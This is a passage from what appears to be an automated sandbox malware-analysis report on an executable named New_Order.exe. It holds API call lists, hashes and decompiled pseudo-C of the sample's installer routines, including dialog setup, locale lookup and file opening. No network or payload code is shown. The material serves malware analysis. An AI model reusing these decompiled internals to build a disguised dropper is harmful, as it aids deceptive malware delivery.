                                                                        • FindFirstFileA.KERNELBASE(7519FA90,0042C0E0,0042BC98,00405BC0,0042BC98,0042BC98,00000000,0042BC98,0042BC98,7519FA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,7519FA90,C:\Users\user\AppData\Local\Temp\), ref: 00406476
                                                                        • FindClose.KERNEL32(00000000), ref: 00406482
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Find$CloseFileFirst
                                                                        • String ID:
                                                                        • API String ID: 2295610775-0
                                                                        • Opcode ID: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                                                                        • Instruction ID: 43645372537bfa69987f3f85d1e9d0a1072f39b89fcefe97c81bac3be47e5bfd
                                                                        • Opcode Fuzzy Hash: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                                                                        • Instruction Fuzzy Hash: 9AD01231514120DFC3502B786D4C84F7A589F05330321CB36F86AF22E0C7348C2296EC
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 84%
                                                                        			E00403CA7(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                                                                        				struct HWND__* _v32;
                                                                        				void* _v84;
                                                                        				void* _v88;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t35;
                                                                        				signed int _t37;
                                                                        				signed int _t39;
                                                                        				struct HWND__* _t49;
                                                                        				signed int _t68;
                                                                        				struct HWND__* _t74;
                                                                        				signed int _t87;
                                                                        				struct HWND__* _t92;
                                                                        				signed int _t100;
                                                                        				int _t104;
                                                                        				signed int _t116;
                                                                        				signed int _t117;
                                                                        				int _t118;
                                                                        				signed int _t123;
                                                                        				struct HWND__* _t126;
                                                                        				struct HWND__* _t127;
                                                                        				int _t128;
                                                                        				long _t131;
                                                                        				int _t133;
                                                                        				int _t134;
                                                                        				void* _t135;
                                                                        				void* _t143;
                                                                        
                                                                        				_t116 = _a8; // window message: 0x110 is WM_INITDIALOG, 0x408 is WM_USER + 8 (application-defined)
                                                                        				if(_t116 == 0x110 || _t116 == 0x408) {
                                                                        					_t35 = _a12;
                                                                        					_t126 = _a4;
                                                                        					__eflags = _t116 - 0x110;
                                                                        					 *0x42a878 = _t35;
                                                                        					if(_t116 == 0x110) {
                                                                        						 *0x42f428 = _t126; // remember the dialog handle
                                                                        						 *0x42a88c = GetDlgItem(_t126, 1); // control ID 1 = IDOK
                                                                        						_t92 = GetDlgItem(_t126, 2); // control ID 2 = IDCANCEL
                                                                        						_push(0xffffffff);
                                                                        						_push(0x1c);
                                                                        						 *0x429858 = _t92;
                                                                        						E0040417B(_t126);
                                                                        						SetClassLongA(_t126, 0xfffffff2,  *0x42ec08); // executed; 0xfffffff2 = -14 = GCL_HICON, sets the class icon
                                                                        						 *0x42ebec = E0040140B(4);
                                                                        						_t35 = 1;
                                                                        						__eflags = 1;
                                                                        						 *0x42a878 = 1;
                                                                        					}
                                                                        					}
                                                                        					_t123 =  *0x40a1dc; // 0xffffffff
                                                                        					_t134 = 0;
                                                                        					_t131 = (_t123 << 6) +  *0x42f460;
                                                                        					__eflags = _t123;
                                                                        					if(_t123 < 0) {
                                                                        						L34:
                                                                        						E004041C7(0x40b);
                                                                        						while(1) {
                                                                        							_t37 =  *0x42a878;
                                                                        							 *0x40a1dc =  *0x40a1dc + _t37;
                                                                        							_t131 = _t131 + (_t37 << 6);
                                                                        							_t39 =  *0x40a1dc; // 0xffffffff
                                                                        							__eflags = _t39 -  *0x42f464;
                                                                        							if(_t39 ==  *0x42f464) {
                                                                        								E0040140B(1);
                                                                        							}
                                                                        							__eflags =  *0x42ebec - _t134; // 0x0
                                                                        							if(__eflags != 0) {
                                                                        								break;
                                                                        							}
                                                                        							__eflags =  *0x40a1dc -  *0x42f464; // 0xffffffff
                                                                        							if(__eflags >= 0) {
                                                                        								break;
                                                                        							}
                                                                        							_t117 =  *(_t131 + 0x14);
                                                                        							E0040618A(_t117, _t126, _t131, 0x437800,  *((intOrPtr*)(_t131 + 0x24)));
                                                                        							_push( *((intOrPtr*)(_t131 + 0x20)));
                                                                        							_push(0xfffffc19);
                                                                        							E0040417B(_t126);
                                                                        							_push( *((intOrPtr*)(_t131 + 0x1c)));
                                                                        							_push(0xfffffc1b);
                                                                        							E0040417B(_t126);
                                                                        							_push( *((intOrPtr*)(_t131 + 0x28)));
                                                                        							_push(0xfffffc1a);
                                                                        							E0040417B(_t126);
                                                                        							_t49 = GetDlgItem(_t126, 3);
                                                                        							__eflags =  *0x42f4cc - _t134;
                                                                        							_v32 = _t49;
                                                                        							if( *0x42f4cc != _t134) {
                                                                        								_t117 = _t117 & 0x0000fefd | 0x00000004;
                                                                        								__eflags = _t117;
                                                                        							}
                                                                        							ShowWindow(_t49, _t117 & 0x00000008);
                                                                        							EnableWindow( *(_t135 + 0x30), _t117 & 0x00000100);
                                                                        							E0040419D(_t117 & 0x00000002);
                                                                        							_t118 = _t117 & 0x00000004;
                                                                        							EnableWindow( *0x429858, _t118);
                                                                        							__eflags = _t118 - _t134;
                                                                        							if(_t118 == _t134) {
                                                                        								_push(1);
                                                                        							} else {
                                                                        								_push(_t134);
                                                                        							}
                                                                        							EnableMenuItem(GetSystemMenu(_t126, _t134), 0xf060, ??);
                                                                        							SendMessageA( *(_t135 + 0x38), 0xf4, _t134, 1);
                                                                        							__eflags =  *0x42f4cc - _t134;
                                                                        							if( *0x42f4cc == _t134) {
                                                                        								_push( *0x42a88c);
                                                                        							} else {
                                                                        								SendMessageA(_t126, 0x401, 2, _t134);
                                                                        								_push( *0x429858);
                                                                        							}
                                                                        							E004041B0();
                                                                        							E004060F7(0x42a890, E00403C88());
                                                                        							E0040618A(0x42a890, _t126, _t131,  &(0x42a890[lstrlenA(0x42a890)]),  *((intOrPtr*)(_t131 + 0x18)));
                                                                        							SetWindowTextA(_t126, 0x42a890);
                                                                        							_push(_t134);
                                                                        							_t68 = E00401389( *((intOrPtr*)(_t131 + 8)));
                                                                        							__eflags = _t68;
                                                                        							if(_t68 != 0) {
                                                                        								continue;
                                                                        							} else {
                                                                        								__eflags =  *_t131 - _t134;
                                                                        								if( *_t131 == _t134) {
                                                                        									continue;
                                                                        								}
                                                                        								__eflags =  *(_t131 + 4) - 5;
                                                                        								if( *(_t131 + 4) != 5) {
                                                                        									DestroyWindow( *0x42ebf8);
                                                                        									 *0x42a068 = _t131;
                                                                        									__eflags =  *_t131 - _t134;
                                                                        									if( *_t131 <= _t134) {
                                                                        										goto L58;
                                                                        									}
                                                                        									_t74 = CreateDialogParamA( *0x42f420,  *_t131 +  *0x42ec00 & 0x0000ffff, _t126,  *(0x40a1e0 +  *(_t131 + 4) * 4), _t131);
                                                                        									__eflags = _t74 - _t134;
                                                                        									 *0x42ebf8 = _t74;
                                                                        									if(_t74 == _t134) {
                                                                        										goto L58;
                                                                        									}
                                                                        									_push( *((intOrPtr*)(_t131 + 0x2c)));
                                                                        									_push(6);
                                                                        									E0040417B(_t74);
                                                                        									GetWindowRect(GetDlgItem(_t126, 0x3fa), _t135 + 0x10);
                                                                        									ScreenToClient(_t126, _t135 + 0x10);
                                                                        									SetWindowPos( *0x42ebf8, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
                                                                        									_push(_t134);
                                                                        									E00401389( *((intOrPtr*)(_t131 + 0xc)));
                                                                        									__eflags =  *0x42ebec - _t134; // 0x0
                                                                        									if(__eflags != 0) {
                                                                        										goto L61;
                                                                        									}
                                                                        									ShowWindow( *0x42ebf8, 8);
                                                                        									E004041C7(0x405);
                                                                        									goto L58;
                                                                        								}
                                                                        								__eflags =  *0x42f4cc - _t134;
                                                                        								if( *0x42f4cc != _t134) {
                                                                        									goto L61;
                                                                        								}
                                                                        								__eflags =  *0x42f4c0 - _t134;
                                                                        								if( *0x42f4c0 != _t134) {
                                                                        									continue;
                                                                        								}
                                                                        								goto L61;
                                                                        							}
                                                                        						}
                                                                        						DestroyWindow( *0x42ebf8);
                                                                        						 *0x42f428 = _t134;
                                                                        						EndDialog(_t126,  *0x429c60);
                                                                        						goto L58;
                                                                        					} else {
                                                                        						__eflags = _t35 - 1;
                                                                        						if(_t35 != 1) {
                                                                        							L33:
                                                                        							__eflags =  *_t131 - _t134;
                                                                        							if( *_t131 == _t134) {
                                                                        								goto L61;
                                                                        							}
                                                                        							goto L34;
                                                                        						}
                                                                        						_push(0);
                                                                        						_t87 = E00401389( *((intOrPtr*)(_t131 + 0x10)));
                                                                        						__eflags = _t87;
                                                                        						if(_t87 == 0) {
                                                                        							goto L33;
                                                                        						}
                                                                        						SendMessageA( *0x42ebf8, 0x40f, 0, 1);
                                                                        						__eflags =  *0x42ebec - _t134; // 0x0
                                                                        						return 0 | __eflags == 0x00000000;
                                                                        					}
                                                                        				} else {
                                                                        					_t126 = _a4;
                                                                        					_t134 = 0;
                                                                        					if(_t116 == 0x47) {
                                                                        						SetWindowPos( *0x42a870, _t126, 0, 0, 0, 0, 0x13);
                                                                        					}
                                                                        					if(_t116 == 5) {
                                                                        						asm("sbb eax, eax");
                                                                        						ShowWindow( *0x42a870,  ~(_a12 - 1) & _t116);
                                                                        					}
                                                                        					if(_t116 != 0x40d) {
                                                                        						__eflags = _t116 - 0x11;
                                                                        						if(_t116 != 0x11) {
                                                                        							__eflags = _t116 - 0x111;
                                                                        							if(_t116 != 0x111) {
                                                                        								L26:
                                                                        								return E004041E2(_t116, _a12, _a16);
                                                                        							}
                                                                        							_t133 = _a12 & 0x0000ffff;
                                                                        							_t127 = GetDlgItem(_t126, _t133);
                                                                        							__eflags = _t127 - _t134;
                                                                        							if(_t127 == _t134) {
                                                                        								L13:
                                                                        								__eflags = _t133 - 1;
                                                                        								if(_t133 != 1) {
                                                                        									__eflags = _t133 - 3;
                                                                        									if(_t133 != 3) {
                                                                        										_t128 = 2;
                                                                        										__eflags = _t133 - _t128;
                                                                        										if(_t133 != _t128) {
                                                                        											L25:
                                                                        											SendMessageA( *0x42ebf8, 0x111, _a12, _a16);
                                                                        											goto L26;
                                                                        										}
                                                                        										__eflags =  *0x42f4cc - _t134;
                                                                        										if( *0x42f4cc == _t134) {
                                                                        											_t100 = E0040140B(3);
                                                                        											__eflags = _t100;
                                                                        											if(_t100 != 0) {
                                                                        												goto L26;
                                                                        											}
                                                                        											 *0x429c60 = 1;
                                                                        											L21:
                                                                        											_push(0x78);
                                                                        											L22:
                                                                        											E00404154();
                                                                        											goto L26;
                                                                        										}
                                                                        										E0040140B(_t128);
                                                                        										 *0x429c60 = _t128;
                                                                        										goto L21;
                                                                        									}
                                                                        									__eflags =  *0x40a1dc - _t134; // 0xffffffff
                                                                        									if(__eflags <= 0) {
                                                                        										goto L25;
                                                                        									}
                                                                        									_push(0xffffffff);
                                                                        									goto L22;
                                                                        								}
                                                                        								_push(_t133);
                                                                        								goto L22;
                                                                        							}
                                                                        							SendMessageA(_t127, 0xf3, _t134, _t134);
                                                                        							_t104 = IsWindowEnabled(_t127);
                                                                        							__eflags = _t104;
                                                                        							if(_t104 == 0) {
                                                                        								goto L61;
                                                                        							}
                                                                        							goto L13;
                                                                        						}
                                                                        						SetWindowLongA(_t126, _t134, _t134);
                                                                        						return 1;
                                                                        					} else {
                                                                        						DestroyWindow( *0x42ebf8);
                                                                        						 *0x42ebf8 = _a12;
                                                                        						L58:
                                                                        						if( *0x42b890 == _t134) {
                                                                        							_t143 =  *0x42ebf8 - _t134; // 0x0
                                                                        							if(_t143 != 0) {
                                                                        								ShowWindow(_t126, 0xa);
                                                                        								 *0x42b890 = 1;
                                                                        							}
                                                                        						}
                                                                        						L61:
                                                                        						return 0;
                                                                        					}
                                                                        				}
                                                                        			}
                                                                        0x00404118
                                                                        0x0040411f
                                                                        0x00000000
                                                                        0x00403e6f
                                                                        0x00403e6f
                                                                        0x00403e72
                                                                        0x00403ea5
                                                                        0x00403ea5
                                                                        0x00403ea7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00403ea7
                                                                        0x00403e74
                                                                        0x00403e78
                                                                        0x00403e7d
                                                                        0x00403e7f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00403e8f
                                                                        0x00403e97
                                                                        0x00000000
                                                                        0x00403e9d
                                                                        0x00403ccb
                                                                        0x00403ccb
                                                                        0x00403ccf
                                                                        0x00403cd4
                                                                        0x00403ce3
                                                                        0x00403ce3
                                                                        0x00403cec
                                                                        0x00403cf5
                                                                        0x00403d00
                                                                        0x00403d00
                                                                        0x00403d0c
                                                                        0x00403d28
                                                                        0x00403d2b
                                                                        0x00403d3e
                                                                        0x00403d44
                                                                        0x00403de7
                                                                        0x00000000
                                                                        0x00403df0
                                                                        0x00403d4a
                                                                        0x00403d57
                                                                        0x00403d59
                                                                        0x00403d5b
                                                                        0x00403d7a
                                                                        0x00403d7a
                                                                        0x00403d7d
                                                                        0x00403d82
                                                                        0x00403d85
                                                                        0x00403d95
                                                                        0x00403d96
                                                                        0x00403d98
                                                                        0x00403dce
                                                                        0x00403de1
                                                                        0x00000000
                                                                        0x00403de1
                                                                        0x00403d9a
                                                                        0x00403da0
                                                                        0x00403db9
                                                                        0x00403dbe
                                                                        0x00403dc0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00403dc2
                                                                        0x00403dae
                                                                        0x00403dae
                                                                        0x00403db0
                                                                        0x00403db0
                                                                        0x00000000
                                                                        0x00403db0
                                                                        0x00403da3
                                                                        0x00403da8
                                                                        0x00000000
                                                                        0x00403da8
                                                                        0x00403d87
                                                                        0x00403d8d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00403d8f
                                                                        0x00000000
                                                                        0x00403d8f
                                                                        0x00403d7f
                                                                        0x00000000
                                                                        0x00403d7f
                                                                        0x00403d65
                                                                        0x00403d6c
                                                                        0x00403d72
                                                                        0x00403d74
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00403d74
                                                                        0x00403d30
                                                                        0x00000000
                                                                        0x00403d0e
                                                                        0x00403d14
                                                                        0x00403d1e
                                                                        0x00404125
                                                                        0x0040412b
                                                                        0x0040412d
                                                                        0x00404133
                                                                        0x00404138
                                                                        0x0040413e
                                                                        0x0040413e
                                                                        0x00404133
                                                                        0x00404148
                                                                        0x00000000
                                                                        0x00404148
                                                                        0x00403d0c

                                                                        APIs
                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CE3
                                                                        • ShowWindow.USER32(?), ref: 00403D00
                                                                        • DestroyWindow.USER32 ref: 00403D14
                                                                        • SetWindowLongA.USER32 ref: 00403D30
                                                                        • GetDlgItem.USER32 ref: 00403D51
                                                                        • SendMessageA.USER32 ref: 00403D65
                                                                        • IsWindowEnabled.USER32(00000000), ref: 00403D6C
                                                                        • GetDlgItem.USER32 ref: 00403E1A
                                                                        • GetDlgItem.USER32 ref: 00403E24
                                                                        • KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 00403E3E
                                                                        • SendMessageA.USER32 ref: 00403E8F
                                                                        • GetDlgItem.USER32 ref: 00403F35
                                                                        • ShowWindow.USER32(00000000,?), ref: 00403F56
                                                                        • EnableWindow.USER32(?,?), ref: 00403F68
                                                                        • EnableWindow.USER32(?,?), ref: 00403F83
                                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F99
                                                                        • EnableMenuItem.USER32 ref: 00403FA0
                                                                        • SendMessageA.USER32 ref: 00403FB8
                                                                        • SendMessageA.USER32 ref: 00403FCB
                                                                        • lstrlenA.KERNEL32(0042A890,?,0042A890,00000000), ref: 00403FF5
                                                                        • SetWindowTextA.USER32(?,0042A890), ref: 00404004
                                                                        • ShowWindow.USER32(?,0000000A), ref: 00404138
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Window$Item$MessageSend$EnableShow$Menu$CallbackDestroyDispatcherEnabledLongSystemTextUserlstrlen
                                                                        • String ID:
                                                                        • API String ID: 4050669955-0
                                                                        • Opcode ID: 7a5d9994b8b7d5483664d5ab44f9fe767d237ce2ed75d97b1bae36ca26718a9b
                                                                        • Instruction ID: 5e2b37e592d4e435839d8b6e88a40281f914ef55e2ab9fcffeaa2cd4c4a1132c
                                                                        • Opcode Fuzzy Hash: 7a5d9994b8b7d5483664d5ab44f9fe767d237ce2ed75d97b1bae36ca26718a9b
                                                                        • Instruction Fuzzy Hash: 45C1D271600204AFDB21AF62ED88D2B3ABCEB95706F50053EF641B51F0CB799892DB1D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 96%
                                                                        			E0040390A(void* __eflags) {
                                                                        				intOrPtr _v4;
                                                                        				intOrPtr _v8;
                                                                        				int _v12;
                                                                        				void _v16;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				intOrPtr* _t17;
                                                                        				void* _t25;
                                                                        				void* _t27;
                                                                        				int _t28;
                                                                        				void* _t31;
                                                                        				int _t34;
                                                                        				int _t35;
                                                                        				intOrPtr _t36;
                                                                        				int _t39;
                                                                        				char _t57;
                                                                        				CHAR* _t59;
                                                                        				signed char _t63;
                                                                        				signed short _t67;
                                                                        				CHAR* _t74;
                                                                        				intOrPtr _t76;
                                                                        				CHAR* _t81;
                                                                        
                                                                        				_t76 =  *0x42f434;
                                                                        				_t17 = E00406500(2);
                                                                        				_t84 = _t17;
                                                                        				if(_t17 == 0) {
                                                                        					_t74 = 0x42a890;
                                                                        					"1033" = 0x30;
                                                                        					 *0x436001 = 0x78;
                                                                        					 *0x436002 = 0;
                                                                        					E00405FDE(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a890, 0);
                                                                        					__eflags =  *0x42a890;
                                                                        					if(__eflags == 0) {
                                                                        						E00405FDE(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040836A, 0x42a890, 0);
                                                                        					}
                                                                        					lstrcatA("1033", _t74);
                                                                        				} else {
                                                                        					_t67 =  *_t17(); // executed
                                                                        					E00406055("1033", _t67 & 0x0000ffff);
                                                                        				}
                                                                        				E00403BCF(_t71, _t84);
                                                                        				_t80 = "C:\\Users\\alfons\\AppData\\Local\\Temp";
                                                                        				 *0x42f4c0 =  *0x42f43c & 0x00000020;
                                                                        				 *0x42f4dc = 0x10000;
                                                                        				if(E00405B7D(_t84, "C:\\Users\\alfons\\AppData\\Local\\Temp") != 0) {
                                                                        					L16:
                                                                        					if(E00405B7D(_t92, _t80) == 0) {
                                                                        						E0040618A(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118)));
                                                                        					}
                                                                        					_t25 = LoadImageA( *0x42f420, 0x67, 1, 0, 0, 0x8040); // executed
                                                                        					 *0x42ec08 = _t25;
                                                                        					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
                                                                        						L21:
                                                                        						if(E0040140B(0) == 0) {
                                                                        							_t27 = E00403BCF(_t71, __eflags);
                                                                        							__eflags =  *0x42f4e0;
                                                                        							if( *0x42f4e0 != 0) {
                                                                        								_t28 = E004052F0(_t27, 0);
                                                                        								__eflags = _t28;
                                                                        								if(_t28 == 0) {
                                                                        									E0040140B(1);
                                                                        									goto L33;
                                                                        								}
                                                                        								__eflags =  *0x42ebec; // 0x0
                                                                        								if(__eflags == 0) {
                                                                        									E0040140B(2);
                                                                        								}
                                                                        								goto L22;
                                                                        							}
                                                                        							ShowWindow( *0x42a870, 5); // executed
                                                                        							_t34 = E00406492("RichEd20"); // executed
                                                                        							__eflags = _t34;
                                                                        							if(_t34 == 0) {
                                                                        								E00406492("RichEd32");
                                                                        							}
                                                                        							_t81 = "RichEdit20A";
                                                                        							_t35 = GetClassInfoA(0, _t81, 0x42ebc0);
                                                                        							__eflags = _t35;
                                                                        							if(_t35 == 0) {
                                                                        								GetClassInfoA(0, "RichEdit", 0x42ebc0);
                                                                        								 *0x42ebe4 = _t81;
                                                                        								RegisterClassA(0x42ebc0);
                                                                        							}
                                                                        							_t36 =  *0x42ec00; // 0x0
                                                                        							_t39 = DialogBoxParamA( *0x42f420, _t36 + 0x00000069 & 0x0000ffff, 0, E00403CA7, 0); // executed
                                                                        							E0040385A(E0040140B(5), 1);
                                                                        							return _t39;
                                                                        						}
                                                                        						L22:
                                                                        						_t31 = 2;
                                                                        						return _t31;
                                                                        					} else {
                                                                        						_t71 =  *0x42f420;
                                                                        						 *0x42ebc4 = E00401000;
                                                                        						 *0x42ebd0 =  *0x42f420;
                                                                        						 *0x42ebd4 = _t25;
                                                                        						 *0x42ebe4 = 0x40a1f4;
                                                                        						if(RegisterClassA(0x42ebc0) == 0) {
                                                                        							L33:
                                                                        							__eflags = 0;
                                                                        							return 0;
                                                                        						}
                                                                        						SystemParametersInfoA(0x30, 0,  &_v16, 0);
                                                                        						 *0x42a870 = CreateWindowExA(0x80, 0x40a1f4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42f420, 0);
                                                                        						goto L21;
                                                                        					}
                                                                        				} else {
                                                                        					_t71 =  *(_t76 + 0x48);
                                                                        					_t86 = _t71;
                                                                        					if(_t71 == 0) {
                                                                        						goto L16;
                                                                        					}
                                                                        					_t74 = 0x42e3c0;
                                                                        					E00405FDE(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x42f478, 0x42e3c0, 0);
                                                                        					_t57 =  *0x42e3c0; // 0x47
                                                                        					if(_t57 == 0) {
                                                                        						goto L16;
                                                                        					}
                                                                        					if(_t57 == 0x22) {
                                                                        						_t74 = 0x42e3c1;
                                                                        						 *((char*)(E00405ABA(0x42e3c1, 0x22))) = 0;
                                                                        					}
                                                                        					_t59 = lstrlenA(_t74) + _t74 - 4;
                                                                        					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
                                                                        						L15:
                                                                        						E004060F7(_t80, E00405A8F(_t74));
                                                                        						goto L16;
                                                                        					} else {
                                                                        						_t63 = GetFileAttributesA(_t74);
                                                                        						if(_t63 == 0xffffffff) {
                                                                        							L14:
                                                                        							E00405AD6(_t74);
                                                                        							goto L15;
                                                                        						}
                                                                        						_t92 = _t63 & 0x00000010;
                                                                        						if((_t63 & 0x00000010) != 0) {
                                                                        							goto L15;
                                                                        						}
                                                                        						goto L14;
                                                                        					}
                                                                        				}
                                                                        			}


                                                                        APIs
                                                                          • Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                                          • Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                                        • GetUserDefaultUILanguage.KERNELBASE(00000002,7519FA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\New_Order.exe" ,00000000), ref: 00403924
                                                                          • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                                                                        • lstrcatA.KERNEL32(1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,7519FA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\New_Order.exe" ,00000000), ref: 00403985
                                                                        • lstrlenA.KERNEL32(GHFGHFGHFDGDFGDFg,?,?,?,GHFGHFGHFDGDFGDFg,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,7519FA90), ref: 004039FA
                                                                        • lstrcmpiA.KERNEL32(?,.exe,GHFGHFGHFDGDFGDFg,?,?,?,GHFGHFGHFDGDFGDFg,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000), ref: 00403A0D
                                                                        • GetFileAttributesA.KERNEL32(GHFGHFGHFDGDFGDFg), ref: 00403A18
                                                                        • LoadImageA.USER32 ref: 00403A61
                                                                        • RegisterClassA.USER32 ref: 00403A9E
                                                                        • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403AB6
                                                                        • CreateWindowExA.USER32 ref: 00403AEB
                                                                        • ShowWindow.USER32(00000005,00000000), ref: 00403B21
                                                                        • GetClassInfoA.USER32 ref: 00403B4D
                                                                        • GetClassInfoA.USER32 ref: 00403B5A
                                                                        • RegisterClassA.USER32 ref: 00403B63
                                                                        • DialogBoxParamA.USER32 ref: 00403B82
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                        • String ID: "C:\Users\user\Desktop\New_Order.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$GHFGHFGHFDGDFGDFg$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                        • API String ID: 606308-1706872007
                                                                        • Opcode ID: bf4b58a18f8def52aed812ad83ca3b0c7ceda486cf0da5eaf41a6ea4bc3d6bf1
                                                                        • Instruction ID: 74cd8b4f7d81cde8c77274d740e3983652abf123a0ec58253698c850822a2f16
                                                                        • Opcode Fuzzy Hash: bf4b58a18f8def52aed812ad83ca3b0c7ceda486cf0da5eaf41a6ea4bc3d6bf1
                                                                        • Instruction Fuzzy Hash: EC61A5702402016ED220FB669D46F373ABCEB4474DF50403FF995B62E3DA7DA9068A2D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 78%
                                                                        			E00402EA1(void* __eflags, signed int _a4) {
                                                                        				DWORD* _v8;
                                                                        				DWORD* _v12;
                                                                        				void* _v16;
                                                                        				intOrPtr _v20;
                                                                        				long _v24;
                                                                        				intOrPtr _v28;
                                                                        				intOrPtr _v32;
                                                                        				intOrPtr _v36;
                                                                        				intOrPtr _v40;
                                                                        				signed int _v44;
                                                                        				long _t43;
                                                                        				long _t50;
                                                                        				void* _t57;
                                                                        				intOrPtr* _t59;
                                                                        				long _t60;
                                                                        				long _t70;
                                                                        				signed int _t77;
                                                                        				intOrPtr _t80;
                                                                        				long _t82;
                                                                        				void* _t85;
                                                                        				signed int _t87;
                                                                        				void* _t89;
                                                                        				long _t90;
                                                                        				long _t93;
                                                                        				intOrPtr* _t94;
                                                                        
                                                                        				_t82 = 0;
                                                                        				_v12 = 0;
                                                                        				_v8 = 0;
                                                                        				_t43 = GetTickCount();
                                                                        				_t91 = "C:\\Users\\alfons\\Desktop\\New_Order.exe";
                                                                        				 *0x42f430 = _t43 + 0x3e8;
                                                                        				GetModuleFileNameA(0, "C:\\Users\\alfons\\Desktop\\New_Order.exe", 0x400);
                                                                        				_t89 = E00405C90(_t91, 0x80000000, 3);
                                                                        				_v16 = _t89;
                                                                        				 *0x40a018 = _t89;
                                                                        				if(_t89 == 0xffffffff) {
                                                                        					return "Error launching installer";
                                                                        				}
                                                                        				_t92 = "C:\\Users\\alfons\\Desktop";
                                                                        				E004060F7("C:\\Users\\alfons\\Desktop", _t91);
                                                                        				E004060F7(0x437000, E00405AD6(_t92));
                                                                        				_t50 = GetFileSize(_t89, 0);
                                                                        				 *0x42944c = _t50;
                                                                        				_t93 = _t50;
                                                                        				if(_t50 <= 0) {
                                                                        					L24:
                                                                        					E00402E3D(1);
                                                                        					if( *0x42f438 == _t82) {
                                                                        						goto L29;
                                                                        					}
                                                                        					if(_v8 == _t82) {
